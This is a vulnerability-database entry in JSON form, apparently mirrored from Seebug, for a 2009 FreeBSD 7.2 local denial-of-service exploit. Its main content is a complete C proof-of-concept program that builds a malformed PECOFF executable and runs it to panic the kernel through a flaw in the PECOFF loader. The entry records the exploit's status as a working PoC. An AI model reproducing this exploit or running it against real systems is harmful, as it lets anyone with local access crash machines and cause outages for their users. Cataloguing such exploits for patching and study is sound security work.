DATABASE RESOURCES PRICING ABOUT US

{"sourceData": "\n /* pecoff_panic.c\n *\n * by Shaun Colley, 20 July 2009\n *\n * this code will panic the freebsd kernel due to a bug in the PECOFF executable loader\n * code ('options PECOFF_SUPPORT' in kernel config or `kldload pecoff`)\n *\n * panic(9) is in vm_fault due to a page fault. the panic seems to be caused in\n * generic_bcopy...probably hitting a guard page..maybe exploitable(??) but this is just\n * a DoS at the moment :) (ugly code btw)\n *\n * tested on freebsd 7.2-RELEASE\n *\n * - shaun\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <fcntl.h>\n\nint main() {\nint i, fd;\nsystem("rm -rf evilprog.exe; touch evilprog.exe");\nfd = open("evilprog.exe", O_WRONLY);\nchar buf[0x3a+2+0x04+4000];\nbuf[0] = 'M';\nbuf[1] = 'Z'; /* magic */\nfor(i = 2; i<0x3c; i++) buf[i] = 'a';\nbuf[0x3c] = 0xee;\nbuf[0x3d] = 0xee;\nbuf[0x3e] = 0xee;\nbuf[0x3f] = 0xee;\nfor(i = 0x40; i<(0x40+4000); i++) buf[i] = 0x61;\nwrite(fd, buf, 0x3a+2+0x04+4000);\nclose(fd);\nsystem("chmod 700 evilprog.exe");\nsystem("./evilprog.exe"); /* run the dodgy PECOFF binary */\n}\n\n// sebug.net\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-14799", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-14799", "type": "seebug", "viewCount": 4, "references": [], "lastseen": "2017-11-19T18:43:17", "published": "2009-07-20T00:00:00", "cvelist": [], "id": "SSV:14799", "enchantments_done": [], "modified": "2009-07-20T00:00:00", "title": "FreeBSD 7.2 (pecoff executable) Local Denial of Service Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645493680, "score": 1659785532, "epss": 1678851499}}

{}